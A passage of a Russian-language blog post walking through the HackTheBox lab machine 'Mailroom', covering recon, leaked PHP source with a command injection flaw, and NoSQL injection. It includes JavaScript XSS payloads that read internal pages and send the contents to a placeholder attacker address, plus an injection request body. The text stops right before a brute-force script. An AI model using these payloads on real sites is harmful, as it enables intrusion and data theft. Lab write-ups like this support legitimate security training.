{"id":146,"date":"2023-08-21T12:03:56","date_gmt":"2023-08-21T09:03:56","guid":{"rendered":"https:\/\/seq.team\/?p=146"},"modified":"2025-12-02T15:15:53","modified_gmt":"2025-12-02T12:15:53","slug":"htb-mailroom-hard","status":"publish","type":"post","link":"https:\/\/seq.team\/en\/blog\/htb-mailroom-hard\/","title":{"rendered":"\u0420\u0430\u0437\u0431\u043e\u0440 HackTheBox – Mailroom (Hard)"},"content":{"rendered":"\n
\u0421\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u044c:<\/td>Hard<\/td><\/tr>
\u041e\u0421:<\/td>Linux<\/td><\/tr>
\u0411\u0430\u043b\u043b\u044b:<\/td>40<\/td><\/tr>
IP:<\/td>10.10.11.209<\/td><\/tr>
\u0422\u0435\u0433\u0438<\/td>Code Review, XSS, NoSQL, System call interception<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

<\/p>\n\n\n\n

<\/p>\n\n\n\n

<\/p>\n\n\n\n

<\/p>\n\n\n\n

<\/p>\n\n\n\n

\u041a\u0440\u0430\u0442\u043a\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u044f<\/h3>\n\n\n\n

\u041f\u043e\u0441\u043b\u0435 \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0439 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u043c \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0438\u043c\u0435\u043d\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438 \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434 \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432. \u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e XSS \u0432 \u0444\u043e\u0440\u043c\u0435 \u043e\u0431\u0440\u0430\u0442\u043d\u043e\u0439 \u0441\u0432\u044f\u0437\u0438 \u0438 \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0438 NoSQL \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f tristan<\/strong>. \u0417\u0430\u0442\u0435\u043c \u0447\u0435\u0440\u0435\u0437 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u0443\u044e \u0432 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u043c \u043a\u043e\u0434\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0438 \u043a\u043e\u043c\u0430\u043d\u0434 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0434\u043e\u0441\u0442\u0443\u043f \u0432 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440 \u0441 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u043c. \u0412 \u043d\u0451\u043c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u043c \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f matthew<\/strong>, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0444\u043b\u0430\u0433 \u0438 \u0434\u0432\u0438\u0433\u0430\u0435\u043c\u0441\u044f \u0433\u043e\u0440\u0438\u0437\u043e\u043d\u0442\u0430\u043b\u044c\u043d\u043e. \u0412 \u0434\u043e\u043c\u0430\u0448\u043d\u0435\u0439 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 \u044d\u0442\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u043c \u0431\u0430\u0437\u0443 \u0434\u0430\u043d\u043d\u044b\u0445 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 kbdx<\/em> \u0438 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0443\u044e \u0435\u0439 \u0443\u0442\u0438\u043b\u0438\u0442\u0443 kpcli<\/em>, \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0435\u043c \u0432\u0432\u043e\u0434, \u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u043c \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043c\u0430\u0441\u0442\u0435\u0440-\u043f\u0430\u0440\u043e\u043b\u044c \u043e\u0442 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445. \u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043f\u0430\u0440\u043e\u043b\u044c \u0438 \u0444\u043b\u0430\u0433 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f root<\/strong>.<\/p>\n\n\n\n

\u0424\u0430\u0437\u0430 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438<\/h3>\n\n\n\n

\u041f\u0440\u043e\u0432\u0435\u0434\u0451\u043c \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0435 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0446\u0435\u043b\u0438: <\/p>\n\n\n\n

\n

nmap -sS -p- 10.10.11.209<\/p>\n<\/blockquote>\n\n\n

\nPORT STATE SERVICE\n22\/tcp open ssh\n80\/tcp open http\n<\/pre><\/div>\n\n\n
\u041f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u043c \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e: nmap -sVC -O -p22,80 10.10.11.209<\/code><\/p>\n\n\n
\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey:  \n|   3072 94:bb:2f:fc:ae:b9:b1:82:af:d7:89:81:1a:a7:6c:e5 (RSA) \n|   256 82:1b:eb:75:8b:96:30:cf:94:6e:79:57:d9:dd:ec:a7 (ECDSA) \n|_  256 19:fb:45:fe:b9:e4:27:5d:e5:bb:f3:54:97:dd:68:cf (ED25519) \n80\/tcp open  http    Apache httpd 2.4.54 ((Debian)) \n|_http-title: The Mail Room \n|_http-server-header: Apache\/2.4.54 (Debian) \nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 - 5.4 (93%)\n<\/pre><\/div>\n\n\n
\u0414\u0430\u043b\u0435\u0435, \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0440\u0430\u0437\u0434\u0435\u043b\u044b \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438:<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
\u0414\u043e\u0431\u0430\u0432\u0438\u043c \u0434\u043e\u043c\u0435\u043d \u0432 \/etc\/hosts<\/code><\/p>\n\n\n
\n# HTB\n10.10.11.209    mailroom.htb\n<\/pre><\/div>\n\n\n
\u041f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0438\u043c\u0435\u043d\u0430 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0441\u0435\u0440\u0432\u0438\u0441\u0430: Tristan Pitt, Matthew Conley, Chris McLovin\u2019, Vivien Perkins<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u0414\u0430\u043b\u0435\u0435 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0438\u043c \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0439 \u0438 \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d\u043e\u0432 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0432 \u0441\u0435\u0440\u0432\u0438\u0441\u0435 \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0433\u043e \u043b\u0443\u0442\u0430, \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u043c\u043e\u0436\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c gobuster, feroxbuster, fuff<\/code> \u0438\u043b\u0438 \u043b\u044e\u0431\u043e\u0439 \u0434\u0440\u0443\u0433\u043e\u0439 \u0441\u043a\u0430\u043d\u0435\u0440 \u043d\u0430 \u0432\u0430\u0448\u0435 \u0443\u0441\u043c\u043e\u0442\u0440\u0435\u043d\u0438\u0435:<\/p>\n\n\n
\ngobuster dir -u http:\/\/mailroom.htb -w \/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt -k\n<\/pre><\/div>\n\n\n
\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0441\u043a\u0430\u043d\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e gobuster<\/code>:<\/p>\n\n\n
\n\/assets               (Status: 301) [Size: 313] [--> http:\/\/mailroom.htb\/assets\/]\n\/css                  (Status: 301) [Size: 310] [--> http:\/\/mailroom.htb\/css\/]\n\/template             (Status: 403) [Size: 277] \n\/js                   (Status: 301) [Size: 309] [--> http:\/\/mailroom.htb\/js\/]\n\/javascript           (Status: 301) [Size: 317] [--> http:\/\/mailroom.htb\/javascript\/] \n\/font                 (Status: 301) [Size: 311] [--> http:\/\/mailroom.htb\/font\/]\n\/server-status        (Status: 403) [Size: 277]\n<\/pre><\/div>\n\n\n
\u0421\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u043c \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d\u044b \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e fuff<\/code>: <\/p>\n\n\n
\nffuf -u "http:\/\/mailroom.htb\/" -H 'Host: FUZZ.mailroom.htb' -w \/usr\/share\/wordlists\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt -fs 0,7748\n<\/pre><\/div>\n\n\n
\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f:<\/p>\n\n\n
\n* FUZZ: git \n* FUZZ: beta\n<\/pre><\/div>\n\n\n
\u0414\u043e\u0431\u0430\u0432\u0438\u043c \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d\u044b beta \u0438 git \u0432 \u0444\u0430\u0439\u043b hosts \u0438 \u0440\u0430\u0437\u0432\u0435\u0434\u0443\u0435\u043c \u0438\u0445 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435:<\/p>\n\n\n
\n# HTB \n10.10.11.209    mailroom.htb    git.mailroom.htb        beta.mailroom.htb\n<\/pre><\/div>\n\n\n
\u041d\u0430 \u043f\u0435\u0440\u0432\u044b\u0439 \u0432\u0437\u0433\u043b\u044f\u0434 beta.mailroom.htb \u043d\u0438\u0447\u0435\u043c \u043d\u0435 \u043e\u0442\u043b\u0438\u0447\u0430\u0435\u0442\u0441\u044f \u043e\u0442 mailroom.htb. git.mailroom.htb \u0432 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434 \u043d\u0435\u043a\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0438\u0441\u0430 \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0430\u043c \u0431\u0435\u0437 \u043a\u0430\u043a\u0438\u0445-\u043b\u0438\u0431\u043e \u0443\u0447\u0451\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u043d\u0438\u043c\u0430\u043d\u0438\u0435 \u043e \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u043e\u043c \u0441\u043f\u0438\u0441\u043a\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0441\u0435\u0440\u0432\u0438\u0441\u0430 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f \u0432\u0435\u0440\u0441\u0438\u0439 Gitea (1.18.0).<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u0422\u0435\u043f\u0435\u0440\u044c, \u043c\u044b \u0441 \u0431\u043e\u043b\u044c\u0448\u0435\u0439 \u0443\u0432\u0435\u0440\u0435\u043d\u043d\u043e\u0441\u0442\u044c\u044e \u043c\u043e\u0436\u0435\u043c \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u0442\u044c, \u0447\u0442\u043e \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0435\u0441\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 tristan<\/code> \u0438 matthew<\/code>. \u0414\u0430\u043b\u0435\u0435, \u043c\u043e\u0436\u043d\u043e \u0431\u0435\u0441\u043f\u0440\u0435\u043f\u044f\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043e\u0434\u043d\u043e\u043c\u0443 \u0438\u0437 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0435\u0432:<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u041f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0444\u0430\u0439\u043b\u044b \u0438 \u0432\u044b\u0434\u0435\u043b\u0438\u043c \u0447\u0430\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u043d\u0430\u0441 \u0437\u0430\u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043e\u0432\u0430\u0442\u044c: <\/p>\n\n\n\n
\n
http:\/\/git.mailroom.htb\/matthew\/staffroom\/src\/branch\/main\/auth.php<\/p>\n<\/blockquote>\n\n\n
\n[\u2026]\n$client = new MongoDB\\Client("mongodb:\/\/mongodb:27017"); \/\/ Connect to the MongoDB database\n[\u2026]\n\/\/ Send an email to the user with the 2FA token\n      $to = $user['email'];\n      $subject = '2FA Token';\n      $message = 'Click on this link to authenticate: http:\/\/staff-review-panel.mailroom.htb\/auth.php?token=' . $token;\n      mail($to, $subject, $message);\n[\u2026]\n<\/pre><\/div>\n\n\n
\n
http:\/\/git.mailroom.htb\/matthew\/staffroom\/src\/branch\/main\/inspect.php<\/p>\n<\/blockquote>\n\n\n
\n[...]\n$data = '';\nif (isset($_POST['inquiry_id'])) {\n      $inquiryId = preg_replace('\/[\\$&lt;>;|&amp;{}\\(\\)\\[\\]\\'\\"]\/', '', $_POST['inquiry_id']);\n      $contents = shell_exec("cat \/var\/www\/mailroom\/inquiries\/$inquiryId.html");\n[...]\n<\/pre><\/div>\n\n\n
\u0418\u0437 auth.php<\/code> \u043c\u044b \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u0438, \u0447\u0442\u043e \u0435\u0441\u0442\u044c \u0435\u0449\u0451 \u043e\u0434\u0438\u043d \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d staff-review-panel.*<\/code>, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0421\u0423\u0411\u0414 mongodb, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430 2FA. \u0418\u0437 inspect.php<\/code> \u043c\u044b \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u0438, \u0447\u0442\u043e \u0432 \u043a\u043e\u0434\u0435 \u0435\u0441\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Command Injection, \u0444\u0438\u043b\u044c\u0442\u0440\u044b, \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0432 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 preg_replace<\/code> \u043b\u0435\u0433\u043a\u043e \u043e\u0431\u043e\u0439\u0442\u0438 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u0438\u043c\u0432\u043e\u043b\u0430 `<\/code>(backtick)<\/p>\n\n\n\n
\u0414\u043e\u0431\u0430\u0432\u0438\u043c \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d staff-review-panel.*<\/code> \u0432 \u0444\u0430\u0439\u043b hosts<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 SSH \u0438 \u043f\u0440\u043e\u0434\u0432\u0438\u0436\u0435\u043d\u0438\u0435 \u0432 staff-review-panel.*<\/h3>\n\n\n\n
\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c \u043a\u043e\u043d\u0442\u0430\u043a\u0442\u043d\u0443\u044e \u0444\u043e\u0440\u043c\u0443 \u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 XSS, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443: 1<svg\/onload=alert(1)><\/code><\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u0414\u043b\u044f \u0442\u043e\u0433\u043e, \u0447\u0442\u043e XSS \u043e\u0442\u0440\u0430\u0431\u043e\u0442\u0430\u043b\u0430 \u043f\u043e\u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u0442\u0430\u043a\u0436\u0435 \u043d\u0430\u0436\u0430\u0442\u044c \u043d\u0430:<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u0414\u0430\u043b\u0435\u0435, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u043a\u043e\u0434 \u0434\u043b\u044f \u0442\u043e\u0433\u043e, \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 index.php<\/code>:<\/p>\n\n\n
\n<script>var url = "http:\/\/staff-review-panel.mailroom.htb\/index.php";\nvar attacker = "http:\/\/your_VPN_IP\/dump";\nvar xhr = new XMLHttpRequest();\nxhr.onreadystatechange = function() {\n   if (xhr.readyState == XMLHttpRequest.DONE) {\n      fetch(attacker + "@" + encodeURI(btoa(xhr.responseText)))\n   }\n}\nxhr.open('GET', url, true);\nxhr.send(null);<\/script>\n<\/pre><\/div>\n\n\n
\u041f\u0435\u0440\u0435\u0434 \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0435\u0439 \u0432 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432 URL \u0438 \u043f\u043e\u0434\u043d\u044f\u0442\u044c http \u0441\u0435\u0440\u0432\u0435\u0440 c \u043f\u043e\u043c\u043e\u0449\u044c\u044e: python3 -m http.server 80<\/code><\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043d\u0430 \u043f\u043e\u0434\u043d\u044f\u0442\u044b\u0439 SimpleHTTP \u043f\u0438\u0442\u043e\u043d \u0441\u0435\u0440\u0432\u0435\u0440 \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0435 \u0434\u043b\u044f \u0443\u0434\u043e\u0431\u0441\u0442\u0432\u0430 \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b index.php<\/code><\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
\u0414\u0435\u043a\u043e\u0434\u0438\u0440\u0443\u0435\u043c:<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
\u041f\u043e\u043b\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b:<\/p>\n\n\n
\n<!DOCTYPE html>\n<html lang="en">\n\n<head>\n  <meta charset="utf-8" \/>\n  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" \/>\n  <meta name="description" content="" \/>\n  <meta name="author" content="" \/>\n  <title>Inquiry Review Panel<\/title>\n  <!-- Favicon-->\n  <link rel="icon" type="image\/x-icon" href="assets\/favicon.ico" \/>\n  <!-- Bootstrap icons-->\n  <link href="font\/bootstrap-icons.css" rel="stylesheet" \/>\n  <!-- Core theme CSS (includes Bootstrap)-->\n  <link href="css\/styles.css" rel="stylesheet" \/>\n<\/head>\n\n<body>\n  <div class="wrapper fadeInDown">\n    <div id="formContent">\n\n      <!-- Login Form -->\n      <form id='login-form' method="POST">\n        <h2>Panel Login<\/h2>\n        <input required type="text" id="email" class="fadeIn second" name="email" placeholder="Email">\n        <input required type="password" id="password" class="fadeIn third" name="password" placeholder="Password">\n        <input type="submit" class="fadeIn fourth" value="Log In">\n        <p hidden id="message" style="color: #8F8F8F">Only show this line if response - edit code<\/p>\n      <\/form>\n\n      <!-- Remind Passowrd -->\n      <div id="formFooter">\n        <a class="underlineHover" href="register.html">Create an account<\/a>\n      <\/div>\n\n    <\/div>\n  <\/div>\n\n  <!-- Bootstrap core JS-->\n  <script src="js\/bootstrap.bundle.min.js"><\/script>\n\n  <!-- Login Form-->\n  <script>\n    \/\/ Get the form element\n    const form = document.getElementById('login-form');\n\n    \/\/ Add a submit event listener to the form\n    form.addEventListener('submit', event => {\n      \/\/ Prevent the default form submission\n      event.preventDefault();\n\n      \/\/ Send a POST request to the login.php script\n      fetch('\/auth.php', {\n        method: 'POST',\n        body: new URLSearchParams(new FormData(form)),\n        headers: { 'Content-Type': 'application\/x-www-form-urlencoded' }\n      }).then(response => {\n        return response.json();\n\n      }).then(data => {\n        \/\/ Display the name and message in the page\n        document.getElementById('message').textContent = data.message;\n        document.getElementById('password').value = '';\n        document.getElementById('message').removeAttribute("hidden");\n      }).catch(error => {\n        \/\/ Display an error message\n        \/\/alert('Error: ' + error);\n      });\n    });\n  <\/script>\n<\/body>\n<\/html>\n<\/pre><\/div>\n\n\n
\u041f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0432 \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0432 Gitea staff<\/code> \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c, \u0447\u0442\u043e \u0432 \u043a\u043e\u0434\u0435 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 NoSQL \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u044f \u0432 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b email \u0438 password.<\/p>\n\n\n\n
\u0421\u043e\u0437\u0434\u0430\u0451\u043c \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 NoSQL JS \u0441\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u044b\u043c, \u043f\u043e\u0434\u043d\u0438\u043c\u0430\u0435\u043c SimpleHTTP \u0441\u0435\u0440\u0432\u0435\u0440 \u0438 \u0437\u0430\u0442\u0435\u043c \u043e\u0431\u0440\u0430\u0449\u0430\u0435\u043c\u0441\u044f \u043a \u043d\u0435\u043c\u0443(\u0438\u043d\u043e\u0433\u0434\u0430 \u043d\u0435 \u0441\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442 \u0441 \u043f\u0435\u0440\u0432\u043e\u0433\u043e \u0437\u0430\u043f\u0440\u043e\u0441\u0430, \u043f\u0440\u0438\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043e\u0431\u0440\u0430\u0449\u0430\u0442\u044c\u0441\u044f \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0440\u0430\u0437 \u0447\u0435\u0440\u0435\u0437 XSS \u0432 \u0444\u043e\u0440\u043c\u0435):<\/p>\n\n\n
\nvar http = new XMLHttpRequest(); \nhttp.open('POST', "http:\/\/staff-review-panel.mailroom.htb\/auth.php", true);\nhttp.setRequestHeader('Content-type', 'application\/x-www-form-urlencoded');\nhttp.onload = function() \n   {   \n      fetch("http:\/\/your_VPN_IP\/out?" + encodeURI(btoa(this.responseText))); \n   }; \nhttp.send("email[$ne]=test@testy&password[$ne]=pass");\n<\/pre><\/div>\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
\u0412\u044b\u0432\u043e\u0434:<\/p>\n\n\n
\neyJzdWNjZXNzIjpmYWxzZSwibWVzc2FnZSI6IkludmFsaWQgaW5wdXQgZGV0ZWN0ZWQifXsic3VjY2VzcyI6dHJ1ZSwibWVzc2FnZSI6IkNoZWNrIHlvdXIgaW5ib3ggZm9yIGFuIGVtYWlsIHdpdGggeW91ciAyRkEgdG9rZW4ifQ==\n<\/pre><\/div>\n\n\n
\u0414\u0435\u043a\u043e\u0434\u0438\u0440\u0443\u0435\u043c base64:<\/p>\n\n\n
\n{"success":false,"message":"Invalid input detected"}\n{"success":true,"message":"Check your inbox for an email with your 2FA token"}\n<\/pre><\/div>\n\n\n
\u0414\u043b\u044f \u043f\u0435\u0440\u0435\u0431\u043e\u0440\u0430 \u0438\u043c\u0435\u043d\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e NoSQL \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0438 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u043a\u043e\u0434\u043e\u043c:<\/p>\n\n\n
